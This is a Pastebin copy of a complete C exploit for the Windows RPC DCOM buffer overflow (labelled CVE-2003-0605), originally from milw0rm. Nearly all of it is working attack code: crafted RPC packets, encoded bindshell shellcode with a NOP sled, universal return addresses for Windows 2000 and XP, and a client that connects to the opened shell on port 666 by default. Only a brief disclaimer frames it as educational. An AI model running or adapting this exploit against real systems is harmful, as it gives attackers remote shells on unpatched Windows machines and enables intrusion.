Advertisement
FlyFar

Microsoft Windows - 'RPC DCOM' Remote (Universal) - CVE-2003-0605

Jan 30th, 2024
1,965
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 16.90 KB | Cybersecurity | 0 0
  1. /* Windows remote RPC DCOM exploit
  2.  * Coded by oc192
  3.  *
  4.  * Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
  5.  * ExitThread in its shellcode to prevent the RPC service from crashing upon
  6.  * successful exploitation. It also has several other options including definable
  7.  * bindshell and attack ports.
  8.  *
  9.  * Features:
  10.  *
  11.  * -d destination host to attack.
  12.  *
  13.  * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
  14.  *
  15.  * -r for using a custom return address.
  16.  *
  17.  * -t to select target type (Offset) , this includes universal offsets for -
  18.  *    win2k and winXP (Regardless of service pack)
  19.  *
  20.  * -l to select bindshell port on remote machine (Default: 666)
  21.  *
  22.  * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
  23.  *   preventing crash of RPC service on remote machine.
  24.  *
  25.  *   This is provided as proof-of-concept code only for educational
  26.  *   purposes and testing by authorized individuals with permission to
  27.  *   do so.
  28.  */
  29.  
  30. #include <stdio.h>
  31. #include <stdlib.h>
  32. #include <sys/types.h>
  33. #include <sys/socket.h>
  34. #include <netinet/in.h>
  35. #include <arpa/inet.h>
  36. #include <unistd.h>
  37. #include <netdb.h>
  38. #include <fcntl.h>
  39. #include <unistd.h>
  40.  
  41. /* xfocus start */
  42. unsigned char bindstr[]={
  43. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  44. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  45. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  46. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  47. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  48.  
  49. unsigned char request1[]={
  50. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  51. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  52. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  53. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  55. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  56. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  57. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  58. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  59. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  60. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  61. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  62. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  63. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  66. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  74. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  75. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  76. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  77. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  78. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  79. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  82. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  83. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  84. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  85. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  86. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  87. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  88. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  89. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  90. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  92. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  93. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  94. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  95. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  96. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  97. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  98. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  99. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  100. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  101. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  102. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  103. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  104. ,0x00,0x00,0x00,0x00,0x00,0x00};
  105.  
  106. unsigned char request2[]={
  107. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  108. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  109.  
  110. unsigned char request3[]={
  111. 0x5C,0x00
  112. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  113. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  114. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  115. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  116. /* end xfocus */
  117.  
  118. int type=0;
  119. struct
  120. {
  121.   char *os;
  122.   u_long ret;
  123. }
  124.  targets[] =
  125.  {
  126.   { "[Win2k-Universal]", 0x0018759F },
  127.   { "[WinXP-Universal]", 0x0100139d },
  128. }, v;
  129.  
  130.  
  131. void usage(char *prog)
  132. {
  133.   int i;
  134.   printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
  135.   printf("Usage:\n\n");
  136.   printf("%s -d <host> [options]\n", prog);
  137.   printf("Options:\n");
  138.   printf("  -d:     Hostname to attack [Required]\n");
  139.   printf("  -t:     Type [Default: 0]\n");
  140.   printf("  -r:     Return address [Default: Selected from target]\n");
  141.   printf("  -p:     Attack port [Default: 135]\n");
  142.   printf("  -l:     Bindshell port [Default: 666]\n\n");
  143.   printf("Types:\n");
  144.   for(i = 0; i < sizeof(targets)/sizeof(v); i++)
  145.     printf("    %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
  146.   exit(0);
  147. }
  148.  
  149. unsigned char sc[]=
  150.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  151.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  152.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  153.  
  154.     "\xff\xff\xff\xff" /* return address */
  155.    
  156.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  157.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  158.  
  159.     /* bindshell no RPC crash, defineable spawn port */
  160.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  161.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  162.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  163.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  164.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  165.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  166.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  167.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  168.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  169.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  170.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  171.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  172.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  173.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  174.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  175.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  176.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  177.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  178.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  179.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  180.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  181.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  182.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  183.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  184.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  185.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  186.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  187.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  188.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  189.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  190.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  191.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  192.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  193.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  194.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  195.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  196.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  197.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  198.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  199.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  200.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  201.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  202.  
  203. /* xfocus start */
  204. unsigned char request4[]={
  205. 0x01,0x10
  206. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  207. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  208. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  209. };
  210. /* end xfocus */
  211.  
  212. /* Not ripped from teso =) */
  213. void con(int sockfd)
  214. {
  215.   char rb[1500];
  216.   fd_set  fdreadme;
  217.   int i;
  218.  
  219.   FD_ZERO(&fdreadme);
  220.   FD_SET(sockfd, &fdreadme);
  221.   FD_SET(0, &fdreadme);
  222.  
  223.   while(1)
  224.   {
  225.     FD_SET(sockfd, &fdreadme);
  226.     FD_SET(0, &fdreadme);
  227.       if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
  228.         if(FD_ISSET(sockfd, &fdreadme))
  229.         {
  230.           if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
  231.           {
  232.             printf("[-] Connection lost..\n");
  233.             exit(1);
  234.           }
  235.             if(write(1, rb, i) < 0) break;
  236.         }
  237.  
  238.         if(FD_ISSET(0, &fdreadme))
  239.         {
  240.           if((i = read(0, rb, sizeof(rb))) < 0)
  241.           {
  242.             printf("[-] Connection lost..\n");
  243.             exit(1);
  244.           }
  245.            if (send(sockfd, rb, i, 0) < 0) break;
  246.         }
  247.            usleep(10000);
  248.         }
  249.        
  250.         printf("[-] Connection closed by foreign host..\n");
  251.  
  252.         exit(0);
  253. }
  254.  
  255. int main(int argc, char **argv)
  256. {
  257.     int len, len1, sockfd, c, a;
  258.     unsigned long ret;
  259.     unsigned short port = 135;
  260.     unsigned char buf1[0x1000];
  261.     unsigned char buf2[0x1000];
  262.     unsigned short lportl=666; /* drg */
  263.     char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
  264.     struct hostent *he;
  265.     struct sockaddr_in their_addr;
  266.     static char *hostname=NULL;
  267.  
  268.     if(argc<2)
  269.     {
  270.       usage(argv[0]);
  271.     }
  272.  
  273.     while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
  274.     {
  275.       switch (c)
  276.       {
  277.         case 'd':
  278.           hostname = optarg;
  279.           break;
  280.         case 't':
  281.           type = atoi(optarg);
  282.           if((type > 1) || (type < 0))
  283.           {
  284.             printf("[-] Select a valid target:\n");
  285.               for(a = 0; a < sizeof(targets)/sizeof(v); a++)
  286.               printf("    %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);              
  287.               return 1;
  288.           }
  289.           break;
  290.         case 'r':
  291.           targets[type].ret = strtoul(optarg, NULL, 16);
  292.           break;
  293.         case 'p':
  294.           port = atoi(optarg);
  295.           if((port > 65535) || (port < 1))
  296.           {
  297.             printf("[-] Select a port between 1-65535\n");
  298.             return 1;
  299.           }
  300.           break;
  301.         case 'l':
  302.           lportl = atoi(optarg);  
  303.           if((port > 65535) || (port < 1))
  304.           {
  305.             printf("[-] Select a port between 1-65535\n");
  306.             return 1;
  307.           }
  308.           break;
  309.        default:
  310.           usage(argv[0]);
  311.           return 1;
  312.       }
  313.     }
  314.  
  315.     if(hostname==NULL)
  316.     {
  317.       printf("[-] Please enter a hostname with -d\n");
  318.       exit(1);
  319.     }
  320.  
  321.     printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
  322.     printf("[+] Resolving host..\n");
  323.  
  324.     if((he = gethostbyname(hostname)) == NULL)
  325.     {
  326.       printf("[-] gethostbyname: Couldnt resolve hostname\n");
  327.       exit(1);
  328.     }
  329.  
  330.     printf("[+] Done.\n");
  331.  
  332.     printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
  333.               targets[type].os, hostname, port, lportl, targets[type].ret);
  334.  
  335.     /* drg */  
  336.     lportl=htons(lportl);
  337.     memcpy(&lport[1], &lportl, 2);
  338.     *(long*)lport = *(long*)lport ^ 0x9432BF80;
  339.     memcpy(&sc[471],&lport,4);
  340.  
  341.     memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
  342.  
  343.     their_addr.sin_family = AF_INET;
  344.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  345.     their_addr.sin_port = htons(port);
  346.  
  347.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  348.     {
  349.         perror("[-] Socket failed");
  350.         return(0);
  351.     }
  352.    
  353.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  354.     {
  355.         perror("[-] Connect failed");
  356.         return(0);
  357.     }
  358.    
  359.     /* xfocus start */
  360.     len=sizeof(sc);
  361.     memcpy(buf2,request1,sizeof(request1));
  362.     len1=sizeof(request1);
  363.    
  364.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  365.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  366.    
  367.     memcpy(buf2+len1,request2,sizeof(request2));
  368.     len1=len1+sizeof(request2);
  369.     memcpy(buf2+len1,sc,sizeof(sc));
  370.     len1=len1+sizeof(sc);
  371.     memcpy(buf2+len1,request3,sizeof(request3));
  372.     len1=len1+sizeof(request3);
  373.     memcpy(buf2+len1,request4,sizeof(request4));
  374.     len1=len1+sizeof(request4);
  375.    
  376.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  377.    
  378.  
  379.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
  380.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  381.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  382.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  383.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  384.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  385.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  386.     /* end xfocus */
  387.    
  388.  
  389.     if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
  390.     {
  391.             perror("[-] Send failed");
  392.             return(0);
  393.     }
  394.     len=recv(sockfd, buf1, 1000, 0);
  395.    
  396.     if (send(sockfd,buf2,len1,0)== -1)
  397.     {
  398.             perror("[-] Send failed");
  399.             return(0);
  400.     }
  401.     close(sockfd);
  402.     sleep(1);
  403.    
  404.     their_addr.sin_family = AF_INET;
  405.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  406.     their_addr.sin_port = lportl;
  407.  
  408.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  409.     {
  410.         perror("[-] Socket failed");
  411.         return(0);
  412.     }
  413.    
  414.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  415.     {
  416.         printf("[-] Couldnt connect to bindshell, possible reasons:\n");
  417.         printf("    1:  Host is firewalled\n");
  418.         printf("    2:  Exploit failed\n");
  419.         return(0);
  420.     }  
  421.    
  422.     printf("[+] Connected to bindshell..\n\n");
  423.  
  424.     sleep(2);
  425.  
  426.     printf("-- bling bling --\n\n");
  427.  
  428.     con(sockfd);
  429.  
  430.     return(0);
  431. }
  432.  
  433. // milw0rm.com [2003-08-07]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement